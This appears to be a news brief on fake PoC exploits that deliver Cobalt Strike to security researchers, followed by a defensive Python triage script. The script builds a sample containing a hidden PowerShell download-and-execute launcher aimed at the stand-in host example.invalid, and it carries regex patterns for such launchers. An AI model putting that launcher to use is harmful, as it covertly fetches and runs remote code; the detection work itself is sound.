Cybersecurity professionals are being targeted with fake proof-of-concept exploits developed for malware delivery, according to SecurityWeek.
Fraudulent PoC exploits for two Windows remote code execution flaws patched last month, tracked as CVE-2022-24500 and CVE-2022-26809, have been found by Cyble researchers to carry malware. Both fake PoCs are .NET binaries obfuscated with the open source ConfuserEx application protector, and are suspected to have been built by the same threat actor.
Running either binary executes a concealed PowerShell command that downloads Cobalt Strike, which the attacker can then use to fetch additional malware and move laterally through the network.
"Usually, people working in information security or TAs use exploits to check for vulnerabilities. Hence, this malware might only target people from this community. Therefore, it becomes essential for the Infosec Community members to check the credibility of sources before downloading any proof of concept," said Cyble, which noted that it remains uncertain whether the exploits have been executed.
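The practical takeaway from the report above is to triage a downloaded "PoC" before anyone executes it. The script below is an added example, not code from Cyble or from the article: it performs a static string sweep of a binary for the three traits described (a .NET executable, ConfuserEx markers, and a hidden PowerShell launcher whose payload is hidden as base64), decoding any long base64 run the way PowerShell's `-EncodedCommand` does (UTF-16LE) so that a downloader such as `IEX (...).DownloadString(...)` is surfaced even when it never appears in plaintext. The sample "binary", the marker strings, the suspicious-command patterns and the hostname `example.invalid` are all constructed for the example; a clean result only means no launcher strings were found, not that the file is safe, and a real triage would also compare the file's SHA-256 against a trusted source before execution.

```python
"""Static triage of a downloaded 'PoC' binary before anyone runs it (added example)."""
import base64
import hashlib
import re

# Constructed marker lists (not taken from Cyble's report): strings a .NET PE
# carries regardless of obfuscation, and the attribute ConfuserEx stamps on output.
DOTNET_MARKERS = [b"mscoree.dll", b"_CorExeMain"]
CONFUSEREX_MARKERS = [b"ConfusedByAttribute", b"ConfuserEx"]

# Fragments of a hidden PowerShell launcher or downloader, matched case-insensitively.
SUSPICIOUS_RE = re.compile(
    r"powershell|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression"
    r"|downloadstring|downloadfile|executionpolicy\s+bypass|frombase64string",
    re.IGNORECASE,
)
# A base64 run long enough to hold a command line (40+ chars, optional padding).
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_strings(blob: bytes) -> list[str]:
    """Return printable ASCII and UTF-16LE strings of 6+ chars (.NET user strings are UTF-16LE)."""
    found = [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{6,}", blob)]
    found += [m.group().decode("utf-16-le") for m in re.finditer(rb"(?:[\x20-\x7e]\x00){6,}", blob)]
    return found


def decode_b64(token: str) -> list[str]:
    """Decode a base64 token as -EncodedCommand would (UTF-16LE), also trying ASCII.
    Only printable decodings are returned; anything else is treated as non-text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # bad length, padding or alphabet: not a real base64 payload
        return []
    candidates = []
    for encoding in ("utf-16-le", "ascii"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            candidates.append(text)
    return candidates


def triage(blob: bytes) -> dict:
    """Static sweep: file traits, launcher-looking strings, and decoded base64 commands."""
    report = {
        "sha256": hashlib.sha256(blob).hexdigest(),  # for lookup against a trusted source
        "pe": blob[:2] == b"MZ",
        "dotnet": any(m in blob for m in DOTNET_MARKERS),
        "confuserex": any(m in blob for m in CONFUSEREX_MARKERS),
        "suspicious": [],  # plaintext strings that look like a PowerShell launcher
        "decoded": [],     # base64 payloads that decode to such a command
    }
    for text in extract_strings(blob):
        if SUSPICIOUS_RE.search(text):
            report["suspicious"].append(text)
        for token in B64_RE.findall(text):
            report["decoded"] += [c for c in decode_b64(token) if SUSPICIOUS_RE.search(c)]
    report["verdict"] = (
        "hidden PowerShell launcher found: do not run"
        if report["suspicious"] or report["decoded"]
        else "no launcher strings found (not proof of safety)"
    )
    return report


def build_sample() -> bytes:
    """Constructed stand-in for a fake PoC (not a real sample): an MZ stub, .NET and
    ConfuserEx markers, a decoy status string, and a hidden downloader stored the way
    a .NET string literal would be, with the command base64-encoded as UTF-16LE."""
    hidden = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
    encoded = base64.b64encode(hidden.encode("utf-16-le")).decode("ascii")
    launcher = f"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {encoded}"
    decoy = "Exploit completed successfully"
    return b"".join([
        b"MZ" + b"\x00" * 62,
        b"mscoree.dll\x00_CorExeMain\x00",
        b"ConfusedByAttribute\x00\x00\x00",
        decoy.encode("utf-16-le") + b"\x00\x00",
        launcher.encode("utf-16-le") + b"\x00\x00",
    ])


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(f"{key}: {value}")
```

Run against a real download the script is pointed at the file's bytes rather than `build_sample()`; an obfuscator can still defeat a string sweep (the payload may be built at runtime), so a negative result should lead to sandboxed detonation, not to running the PoC on a workstation.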